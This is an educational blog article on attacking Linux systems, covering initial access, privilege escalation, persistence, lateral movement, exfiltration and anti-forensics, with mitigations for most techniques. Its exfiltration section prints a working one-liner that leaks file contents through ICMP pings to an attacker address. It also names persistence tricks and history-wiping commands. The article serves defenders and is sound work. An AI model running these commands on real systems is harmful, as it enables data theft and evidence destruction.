------------------------------------------------------------------------------------------------------------
Attacking Linux: Initial Exploitation
Linux presents a different landscape than typical Windows environments. Unlike personal computers, Linux is often used as a server platform, making it less susceptible to attacks through traditional phishing techniques. However, attackers shift their focus toward exploiting services running on these servers.
Webservers: The Prime Target
Webservers are a favorite target for attackers. They often exploit vulnerabilities in server code to install webshells, potentially gaining full control of the server. Tools like Metasploit make this process easier by automating many steps of the exploitation.
Configuration Issues: The Silent Threat
Open ports are constantly scanned by attackers for weaknesses. Even minor configuration issues can lead to significant problems. Ensuring that all services are properly configured and secured is crucial to prevent unauthorized access.
Account Attacks: The Common Approach
Account attacks range from credential reuse to brute force attacks against authentication systems. Default accounts, especially root, are frequently targeted and should be locked down and monitored. Applying the principle of least privilege across all system and application accounts is essential to minimize risk.
Exploitation Techniques
Public-Facing Applications: Exploiting vulnerabilities in web applications to gain initial access.
Phishing: Targeting users to obtain credentials that can be used to access servers.
Brute Force Attacks: Attempting to gain access by systematically trying different passwords.
Tools and Techniques
Metasploit: A powerful tool for developing and executing exploits against vulnerable systems.
Nmap: Used for network discovery and security auditing.
John the Ripper: A popular password cracking tool.
------------------------------------------------------------------------------------------------------------
Attacking Linux: Privilege Escalation
Privilege escalation in Linux systems often turns out to be surprisingly simple for attackers, largely due to misconfigurations or shortcuts taken by users and administrators. While Linux is known for its robust security features, poor implementation and configuration practices can leave systems vulnerable to exploitation.
1. Applications Running as Root
One of the simplest ways for attackers to escalate privileges is by exploiting applications that are unnecessarily running as root or other privileged users
Mitigation:
Always run applications with the least privilege necessary. Configure them to run under limited accounts.
Regularly audit which accounts are associated with running services and avoid using root unless absolutely essential
2. Sudo Misconfigurations
The sudo command allows users to run commands as the super-user, which is useful for granting temporary elevated privileges.
For example, if a user account is given permissions to run sudo without a password (ALL=(ALL) NOPASSWD: ALL), an attacker gaining access to that account could execute commands as root without needing further credentials.
Mitigation:
Limit sudo privileges to only those users who need them, and require a password for sudo commands.
Regularly review the sudoers file for any misconfigurations.
Use role-based access control (RBAC) to further restrict command usage.
3. Plaintext Passwords in Configuration Files
Linux relies heavily on configuration files, and unfortunately, administrators often store plaintext passwords in them for ease of access.
Mitigation:
Never store passwords in plaintext in configuration files. Use environment variables or encrypted password storage solutions instead.
Restrict file permissions to ensure only trusted users can access sensitive configuration files.
4. Shell History Files
Linux shells, such as Bash and Zsh, store command history in files like ~/.bash_history or ~/.zsh_history. While this can be helpful for administrators, it's also useful for attackers. If a user or admin runs commands with passwords in the command line (for example, using mysql -u root -pPASSWORD), the password can get stored in the history file, giving an attacker access to elevated credentials.
Mitigation:
Avoid passing passwords directly in command lines. Use safer methods like prompting for passwords.
Set the HISTIGNORE environment variable to exclude commands that contain sensitive information from being saved in history files.
Regularly clear history files or disable command history for privileged users.
5. Configuration Issues
A widespread misconception is that Linux is "secure by default." While Linux is more secure than many other systems, poor configuration can introduce vulnerabilities. A few of the most common issues include improper group permissions, unnecessary SUID bits, and path hijacking.
Common configuration issues:
Group Mismanagement: Privileged groups like wheel, sudo, and adm often have broad system access.
Mitigation:
Limit group membership to essential accounts.
Require credentials to be entered when executing commands that need elevated privileges.
SUID Bit Abuse: Some applications have the SUID (Set User ID) bit enabled, which allows them to run with the permissions of the file owner (usually root). Attackers can exploit applications with SUID to execute commands as root.
Mitigation:
Audit and restrict the use of the SUID bit. Only system-critical applications like passwd should have it.
Monitor and log changes to SUID files to detect any suspicious activity.
Path Hijacking: If a script or application calls other executables using relative paths, an attacker can modify the PATH environment variable to point to a malicious file, leading to privilege escalation.
Mitigation:
Always use absolute paths when calling executables in scripts.
Secure the PATH variable to avoid tampering and prevent unauthorized binaries from being executed.
------------------------------------------------------------------------------------------------------------
Attacking Linux: Persistence Techniques
On Linux, attackers have a broad set of options for persistence, with approaches varying across different distributions. Moreover, due to the long uptime of many Linux servers, attackers may rely on staying undetected for extended periods rather than immediately establishing persistence as they might on Windows.
1. Modifying Startup Files
Linux checks various files on system boot and user login, providing attackers with a chance to insert malicious code. Most modifications that result in system-wide persistence require root or elevated privileges, but attackers often target user-level files first, especially when they haven't escalated privileges.
.bashrc File: This hidden file in a user’s home directory is executed every time the user logs in or starts a shell. Attackers can insert malicious commands or scripts that will run automatically when the user logs in, granting them persistent access.
Example:
Adding a reverse shell command to .bashrc, so every time the user logs in, the system automatically connects back to the attacker.
Mitigation:
Regularly check .bashrc for suspicious entries.
Limit access to user home directories.
.ssh Directory: Attackers can place an SSH public key in the authorized_keys file within the .ssh directory of a compromised user account. This allows them to log in without needing the user’s password, bypassing traditional authentication mechanisms.
Example:
Adding an attacker’s SSH key to ~/.ssh/authorized_keys, giving them remote access whenever they want.
Mitigation:
Regularly audit the contents of authorized_keys.
Set appropriate file permissions for .ssh directories.
2. System-Wide Persistence Using Init Systems
To maintain persistent access across system reboots, attackers often target system startup processes. The exact locations where these startup scripts reside vary between Linux distributions.
System V Configurations (Older Systems)
/etc/inittab: The inittab file is used by the init process on some older Linux systems to manage startup processes.
/etc/init.d/ and /etc/rc.d/: These directories store startup scripts that run services when the system boots. Attackers can either modify existing scripts or add new malicious ones.
Mitigation:
Lock down access to startup files and directories.
Regularly audit these directories for unauthorized changes.
SystemD Configurations (Modern Systems)
SystemD is widely used in modern Linux distributions to manage services and startup processes. It offers more flexibility, but also more opportunities for persistence if misused.
/etc/systemd/system/: This directory holds system-wide configuration files for services. Attackers can add their own malicious service definitions here, allowing their backdoor or malware to launch on boot.
Example: Creating a custom malicious service unit file that runs a backdoor when the system starts.
/usr/lib/systemd/user/ & /usr/lib/systemd/system/: Similar to /etc/systemd/system/, these directories are used to store service files. Attackers can modify or add files here to persist across reboots.
Mitigation:
Regularly check for unauthorized system services.
Use access control mechanisms to restrict who can create or modify service files.
3. Cron Jobs
Attackers often use cron jobs to schedule tasks that provide persistence. Cron is a task scheduler in Linux that allows users and admins to run commands or scripts at regular intervals.
User-Level Cron Jobs: Attackers can set up cron jobs for a user that periodically runs malicious commands or connects back to a remote server.
System-Level Cron Jobs: If the attacker has root privileges, they can set up system-wide cron jobs to achieve the same effect on a larger scale.
Mitigation:
Audit system cron directories (/etc/cron.d/, /etc/crontab) to detect malicious entries.
------------------------------------------------------------------------------------------------------------
Note on System V vs. Systemd
System V (SysV), one of the earliest commercial versions of Unix. The key distinction for enterprise incident response lies in how services and daemons are started.
SysV uses the init daemon to manage the startup of applications, and this process is crucial as it is the first to start upon boot (assigned PID 1). If the init daemon fails or becomes corrupted, it can trigger a kernel panic.
In contrast, Systemd is a more recent and modern service management implementation, designed to offer faster and more stable boot processes. It uses targets and service files to launch applications. Most contemporary Linux distributions have adopted Systemd as the default init system.
Identifying the Init System:
Check the /etc/ directory:
If you find /etc/inittab or content within /etc/init.d/, the system is likely using SysV.
If /etc/inittab is absent or there is a /etc/systemd/ directory, it is likely using Systemd.
How services are started:
If services are started with systemctl start service_name, the system uses Systemd.
If services are started with /etc/init.d/service_name start, it is using SysV.
------------------------------------------------------------------------------------------------------------
Attacking Linux – Lateral Movement
In Linux environments, lateral movement can be either more difficult or easier than in Windows environments, depending on credential management.
Credential Reuse: In environments where administrators use the same credentials across multiple systems, attackers can leverage compromised accounts to move laterally via SSH. This can happen when unprotected SSH keys are left on systems, allowing attackers to easily authenticate and access other machines.
Centrally Managed Environments: In environments with centralized credential management (e.g., Active Directory or Kerberos), attacks can mimic Windows-based tactics. This includes techniques like Kerberoasting or password guessing to gain further access
-----------------------------------------------------------------------------------------------------------
Attacking Linux – Command & Control (C2) and Exfiltration
Linux offers numerous native commands that attackers can use to create C2 (Command and Control) channels and exfiltrate data, often bypassing traditional monitoring systems.
ICMP-based Exfiltration: A simple example of data exfiltration using ICMP packets is:
cat file | xxd -p -c 16 | while read line; do ping -p $line -c 1 -q [ATTACKER_IP]; done
This script sends data to the attacker's IP via ICMP packets, and many network security tools may overlook it, viewing it as harmless ping traffic.
Native Tools for Exfiltration: Tools like tar and netcat provide attackers with flexible methods for exfiltration, offering stealthy ways to send data across the network.
-----------------------------------------------------------------------------------------------------------
Attacking Linux – Anti-Forensics
In recent years, attackers have become more sophisticated in their attempts to destroy forensic evidence. Linux offers several powerful tools for anti-forensics, which attackers can use to cover their tracks.
touch: This command allows attackers to alter timestamps on files, making it appear as if certain files were created or modified at different times. However, it only offers second-level accuracy in timestamp manipulation, which can leave traces.
rm: Simply using rm to delete files is often enough to destroy evidence, as file recovery on Linux is notoriously difficult. Unlike some file systems that support undelete features, Linux generally does not.
History File Manipulation:
Unset History: Attackers can use unset HISTFILE to prevent any commands from being saved to the history file.
Clear History: Using history -c clears the history file, making it unrecoverable.
Prevent History Logging: By prefixing commands with a space, attackers can prevent those commands from being logged in the shell history file in the first place.
-----------------------------------------------------------------------------------------------------------
Conclusion
Attacking Linux systems can be both simple and complex, depending on system configurations and administrative practices. Proper system hardening and vigilant credential management are critical to reducing these risks.
Akash Patel
Comments